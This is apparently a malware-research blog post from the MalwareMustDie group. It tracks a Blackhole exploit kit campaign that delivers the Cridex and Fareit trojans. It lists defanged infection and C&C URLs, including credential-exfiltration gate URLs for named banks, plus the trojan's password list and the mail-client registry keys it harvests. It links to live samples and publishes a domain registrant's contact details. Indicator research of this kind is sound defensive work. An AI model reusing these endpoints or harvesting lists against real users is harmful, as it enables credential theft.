As per posted A WEEK AGO here -->>[Prev.Post] that Crime Group STILL infects victims. The infector concepts and binary works is exactly the same as previous,
Infection Source Summary & Trojan Communication Info
Spam infector:URL: h00p://www.irwra.com/wp-content/themes/mantra/uploads/cpa_inform.htm Server: Apache, WordPress IP: 50.116.98.44Blackhole:Landing: h00p://latticesoft.net/detects/continues-little.php Server: nginx/1.3.3 Date: Fri, 21 Dec 2012 18:44:29 GMT Content-Type: text/html X-Powered-By: PHP/5.3.14 IP: 59.57.247.185Trojan Cridex (payload) download url:h00p://latticesoft.net/detects/continues-little.php?zf=30:2v:1f:1j:30&ge=1n:2w:1i:1j:1o:1i:1g:2v:1m:1m&l=1k&iw=z&hf=dTrojan Fareit Download Source:h00p://94.73.129.120:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1 h00p://188.120.226.30:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1 h00p://188.40.109.204:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1 h00p://204.15.30.202:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1 h00p://59.90.221.6:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1 h00p://69.64.89.82:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1 h00p://78.28.120.32:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1 h00p://74.117.107.25:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1 h00p://174.142.68.239:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1 h00p://23.29.73.220:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1 h00p://81.93.250.157:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1 h00p://188.212.156.170:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1 h00p://173.203.102.204:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1 h00p://84.22.100.108:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1 *) With all Proxy's Port/Server: 8080 / nginx/1.0.10Trojan Fareit Stealer Download PoC is as example below:POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US) Host: 94.73.129.120:8080 Content-Length: 347 Connection: Keep-Alive Cache-Control: no-cache ...?f/.....0N}a.9.Je...U;0.. : HTTP/1.1 200 OK Server: nginx/1.0.10 Date: Sat, 22 Dec 2012 08:29:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/5.3.18-1~dotdeb.0 Vary: Accept-EncodingTrojan Fareit Callbacks IP:h00p://132.248.49.112:8080/asp/intro.php h00p://113.130.65.77:8080/asp/intro.php h00p://203.113.98.131:8080/asp/intro.php h00p://110.164.58.250:8080/asp/intro.php h00p://200.108.18.158:8080/asp/intro.php h00p://207.182.144.115:8080/asp/intro.php h00p://148.208.216.70:8080/asp/intro.php h00p://203.172.252.26:8080/asp/intro.php h00p://202.6.120.103:8080/asp/intro.php h00p://203.146.208.180:8080/asp/intro.php h00p://207.126.57.208:8080/asp/intro.php h00p://203.80.16.81:8080/asp/intro.php h00p://202.180.221.186:8080/asp/intro.phpCNC is 62.76.177.51, PoC:// Credentials sent CnC panel var adminPanelLocation = 'h00p://62.76.177.51/if_Career/'; //Data Modify Process: h00p://62.76.177.123/mx/2B/in/cp.php?h=8 // Phishing Credentials urls h00p://62.76.177.51/if_Ipckg/gate.php?botid=RIK-1379CF37C25_9455E50D0B2D20CB&bank=chase h00p://62.76.177.51/if_Ipckg/gate.php?botid=RIK-1379CF37C25_9455E50D0B2D20CB&bank=wellsfargo h00p://62.76.177.51/if_Ipckg/gate.php?botid=RIK-1379CF37C25_9455E50D0B2D20CB&bank=bankofamericaCnC Passwords(reversed from Trojan Fareit):phpbb john316 pass slayer qwerty richard aaaaaa wisdom jesus blink182 amanda praise abc123 peaches nothing zxcvbnm letmein cool ginger samuel test flower mother mike love scooter snoopy dallas password1 banana jessica green hello james welcome testtest monkey asdfasdf pokemon maverick dragon victory iloveyou1 onelove trustno1 london mustang david iloveyou 123qwe helpme mylove shadow startrek justin church christ george jasmine friend sunshine winner orange god master maggie testing destiny computer trinity apple none princess online michelle microsoft tigger 123abc peace bubbles football chicken secret cocacola angel junior grace jordan23 jesus1 chris william ilovegod whatever passw0rd iloveyou2 football1 freedom austin nicole loving killer sparky muffin nathan asdf admin gateway emmanuel soccer merlin fuckyou1 scooby superman google asshole fuckoff michael friends hahaha sammy cheese hope poop maxwell internet shalom blessing jason joshua nintendo blahblah john fuckyou looking myspace1 1q2w3e4r blessed harley matthew baby baseball smokey canada red123 starwars joseph silver blabla purple lucky robert prince jordan digital forever qwert faith thunder asdfgh chelsea summer spirit rachel angel1 ashley bandit rainbow hardcore buster enter guitar dexter heaven anthony peanut saved pepper corvette batman hallo hunter hockey cookie jasper lovely power bailey danielle andrew benjamin soccer1 kitten thomas iloveyou! mickey cassie angels 1q2w3e biteme stella charlie viper hello1 prayer daniel genesis eminem hotdog jennifer knight dakota windows single qwerty1 samantha mustdie hannah creative compaq gates qazwsx foobar diamond billgates happy adidas taylor ghbdtn matrix rotimi forum gfhjkm hgTYDOMiumAnalysis Summary & Research Materials
This time I dump every memory of Trojan Fareit in txt here-->>[PASTEBIN] ↑So you can see which FTP, File, POP/SMTP Credentials data's licked & grabbed - as evidence of this evil stealer crime. Additionally see the Fareit Trojan's config here -->>[PASTEBIN] ↑You can confirm targeted online banks info + phishing html codes these actors used. There is slight BHEK changes in PluginDetect Obfuscated Code (Landing Page), I cracked manually with wrote GUIDANCE to decode here -->>[PASTEBIN] PluginDetect before -->>[PASTEBIN] & after decoded-->>[PASTEBIN] Payload binary static & dynamic analysis text(a quicky) -->>[PASTEBIN] Sample download is here -->>[MEDIAFIRE] Captures data is here (PCAP, RegShot, MEMShot, etc)-->>[MEDIAFIRE]Account Phishing Act by current version Trojan
Hello Citi Account Online!Same as previous: Chase Bank!
This time BANK OF AMERICA!!!
PoC of all possible Email Credentials Also Grabbed
In the previous case, I have strong request to check not only http/ftp/server login, but E-Mail credential. Here we go:POP3_Password2 SMTP_Password2 IMAP_Password2 HTTPMail_Password2 \Microsoft\Windows Live Mail Software\Microsoft\Windows Live Mail \Microsoft\Windows Mail Software\Microsoft\Windows Mail Software\RimArts\B2\Settings DataDir DataDirBak Mailbox.ini Software\Poco Systems Inc Path \PocoSystem.ini Program DataPath accounts.ini \Pocomail Software\IncrediMail EmailAddress Technology PopServer PopPort PopAccount PopPassword SmtpServer SmtpPort SmtpAccount SmtpPassword account.cfg account.cfn \BatMail \The Bat! Software\RIT\The Bat! Software\RIT\The Bat!\Users depot Working Directory ProgramDir Count Default Dir #%d SMTP Email Address SMTP Server POP3 Server POP3 User Name SMTP User Name NNTP Email Address NNTP User Name NNTP Server IMAP Server IMAP User Name Email HTTP User HTTP Server URL POP3 User IMAP User HTTPMail User Name HTTPMail Server SMTP User POP3 Port SMTP Port IMAP Port POP3 Password2 IMAP Password2 NNTP Password2 HTTPMail Password2 SMTP Password2 POP3 Password IMAP Password NNTP Password HTTP Password SMTP Password Software\Microsoft\Internet Account Manager\Accounts Identities Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook Software\Microsoft\Internet Account Manager Outlook \Accounts identification identitymgr inetcomm server passwords outlook account manager passwords identitiesVirus Total Detection Ratio
Landing Page: (3/45) ---->>[VirusTotal] Trojan Cridex Downloader: (15/44) ---->>[VirusTotal] Trojan Fareit Credential Stealer: (4/45) ---->>[VirusTotal]PoC / Analysis ScreenShots
Malware processes:Payload after self copied(dropped) into %AppData%\
Network HTTP Traffic captured:
Need to fix the binary before reversing properly...
//Very annoying anti-reverse.... : : : 0x00003cf2 (01) 47 INC EDI 0x00003cf3 (01) 5c POP ESP 0x00003cf4 (05) a9 2835b437 TEST EAX, 0x37b43528 0x00003cf9 (03) 0ff2f8 PSLLD MM7, MM0 0x00003cfc (01) 4b DEC EBX 0x00003cfd (01) 95 XCHG EBP, EAX 0x00003cfe (02) b2 f9 MOV DL, 0xf9 0x00003d00 (01) ef OUT DX, EAX 0x00003d01 (01) 51 PUSH ECX 0x00003d02 (01) ac LODSB 0x00003d03 (01) 46 INC ESI 0x00003d04 (02) 71 77 JNO 0x00003d7d ; 1 0x00003d04 -------------------------------------------------- 0x00003d06 (02) 72 71 JB 0x00003d79 ; 2 0x00003d06 -------------------------------------------------- 0x00003d08 (02) 77 72 JA 0x00003d7c ; 3 0x00003d08 -------------------------------------------------- 0x00003d0a (02) 71 77 JNO 0x00003d83 ; 4 0x00003d0a -------------------------------------------------- 0x00003d0c (02) 72 71 JB 0x00003d7f ; 5 : : : : : : 3CE8 50 44 44 33 D7 24 91 FF 62 27 47 5C A9 28 35 B4 PDD3.$..b'G..(5. 3CF8 37 0F F2 F8 4B 95 B2 F9 EF 51 AC 46 71 77 72 71 7...K....Q.Fqwrq 3D08 77 72 71 77 72 71 77 72 71 77 72 71 77 72 71 77 wrqwrqwrqwrqwrqw // This qwrqwr :-((( 3D18 72 71 77 72 71 77 72 71 77 72 71 77 72 71 77 72 rqwrqwrqwrqwrqwr 3D28 71 77 72 71 77 72 71 77 72 71 77 72 71 77 72 71 qwrqwrqwrqwrqwrq 3D38 77 72 71 77 72 71 77 72 71 77 72 71 77 72 71 77 wrqwrqwrqwrqwrqw 3D48 72 71 77 72 71 77 72 71 77 72 71 77 72 71 77 72 rqwrqwrqwrqwrqwr 3D58 71 77 72 71 77 72 71 77 72 71 77 72 71 77 72 71 qwrqwrqwrqwrqwrq : : :PoC of the same group as previous case
Seriously, it uses the same NS server registered by same person..// latticesoft.net < dns search ;; QUESTION SECTION: ;latticesoft.net. IN ANY ;; ANSWER SECTION: latticesoft.net. 900 IN A 59.57.247.185 latticesoft.net. 900 IN SOA ns1.amishshoppe.net. . 1356192301 60 120 1048576 900 latticesoft.net. 900 IN NS ns2.amishshoppe.net. latticesoft.net. 900 IN NS ns1.amishshoppe.net. ;; AUTHORITY SECTION: latticesoft.net. 900 IN NS ns2.amishshoppe.net. latticesoft.net. 900 IN NS ns1.amishshoppe.net. ;; ADDITIONAL SECTION: ns1.amishshoppe.net. 3600 IN A 209.140.18.37 ns2.amishshoppe.net. 3600 IN A 211.27.42.138 //PoC that currently infector domain is in service: a.root-servers.net. (198.41.0.4) |\___ i.gtld-servers.net [net] (192.43.172.30) | |\___ ns2.amishshoppe.net [latticesoft.net] (211.27.42.138) * | \___ ns1.amishshoppe.net [latticesoft.net] (209.140.18.37) Got authoritative answer |\___ l.gtld-servers.net [net] (192.41.162.30) | |\___ ns2.amishshoppe.net [latticesoft.net] (211.27.42.138) * | \___ ns1.amishshoppe.net [latticesoft.net] (209.140.18.37) (cached) |\___ m.gtld-servers.net [net] (192.55.83.30) | |\___ ns2.amishshoppe.net [latticesoft.net] (211.27.42.138) * | \___ ns1.amishshoppe.net [latticesoft.net] (209.140.18.37) (cached) |\___ k.gtld-servers.net [net] (192.52.178.30) | |\___ ns2.amishshoppe.net [latticesoft.net] (211.27.42.138) * | \___ ns1.amishshoppe.net [latticesoft.net] (209.140.18.37) (cached) |\___ h.gtld-servers.net [net] (192.54.112.30) | |\___ ns2.amishshoppe.net [latticesoft.net] (211.27.42.138) * | \___ ns1.amishshoppe.net [latticesoft.net] (209.140.18.37) (cached) |\___ b.gtld-servers.net [net] (2001:0503:231d:0000:0000:0000:0002:0030) Not queried |\___ b.gtld-servers.net [net] (192.33.14.30) | |\___ ns2.amishshoppe.net [latticesoft.net] (211.27.42.138) * | \___ ns1.amishshoppe.net [latticesoft.net] (209.140.18.37) (cached) |\___ e.gtld-servers.net [net] (192.12.94.30) | |\___ ns2.amishshoppe.net [latticesoft.net] (211.27.42.138) * | \___ ns1.amishshoppe.net [latticesoft.net] (209.140.18.37) (cached) |\___ j.gtld-servers.net [net] (192.48.79.30) | |\___ ns2.amishshoppe.net [latticesoft.net] (211.27.42.138) * | \___ ns1.amishshoppe.net [latticesoft.net] (209.140.18.37) (cached) |\___ a.gtld-servers.net [net] (2001:0503:a83e:0000:0000:0000:0002:0030) Not queried |\___ a.gtld-servers.net [net] (192.5.6.30) | |\___ ns2.amishshoppe.net [latticesoft.net] (211.27.42.138) * | \___ ns1.amishshoppe.net [latticesoft.net] (209.140.18.37) (cached) |\___ g.gtld-servers.net [net] (192.42.93.30) | |\___ ns2.amishshoppe.net [latticesoft.net] (211.27.42.138) * | \___ ns1.amishshoppe.net [latticesoft.net] (209.140.18.37) (cached) |\___ f.gtld-servers.net [net] (192.35.51.30) | |\___ ns2.amishshoppe.net [latticesoft.net] (211.27.42.138) * | \___ ns1.amishshoppe.net [latticesoft.net] (209.140.18.37) (cached) |\___ c.gtld-servers.net [net] (192.26.92.30) | |\___ ns2.amishshoppe.net [latticesoft.net] (211.27.42.138) * | \___ ns1.amishshoppe.net [latticesoft.net] (209.140.18.37) (cached) \___ d.gtld-servers.net [net] (192.31.80.30) |\___ ns2.amishshoppe.net [latticesoft.net] (211.27.42.138) * \___ ns1.amishshoppe.net [latticesoft.net] (209.140.18.37) (cached) //Historical/pDNS related IP-Domain Info: eaglepointecondo.org A 59.57.247.185 latticesoft.net A 59.57.247.185 eaglepointecondo.biz A 59.57.247.185 sessionid0147239047829578349578239077.pl A 59.57.247.185 // Check AXFR (see whether anyone can changed records w/2ndary DNS) ]$ nslookup > set type=axfr > amishshoppe.net ; Transfer failed. Server: 8.8.8.8 Address: 8.8.8.8#53 // WHOIS Database of DNS Service Domain.... Domain Name: AMISHSHOPPE.NET Registrar: REGISTER.COM, INC. Whois Server: whois.register.com Referral URL: http://www.register.com Name Server: NS1.AMISHSHOPPE.NET Name Server: NS2.AMISHSHOPPE.NET Status: clientTransferProhibited Updated Date: 15-nov-2012 Creation Date: 15-nov-2012 Expiration Date: 15-nov-2013 // Registrant Database Checks... Registrant: Steve Burandt 0n430 Peter Rd Winfield, IL 60190 US Phone: +1.6304626711 Email: solaradvent@yahoo.com Registrar Name....: Register.com Registrar Whois...: whois.register.com Registrar Homepage: www.register.com Domain Name: amishshoppe.net Created on..............: 2012-11-15 Expires on..............: 2013-11-15 Administrative Contact: Steve Burandt 0n430 Peter Rd Winfield, IL 60190 US Phone: +1.6304626711 Email: solaradvent@yahoo.com Technical Contact: Registercom Domain Registrar 12808 Gran Bay Pkwy West Jacksonville, FL 32258 US Phone: +1.9027492701 Email: domainregistrar@register.com DNS Servers: ns2.amishshoppe.net ns1.amishshoppe.net
#MalwareMustDie
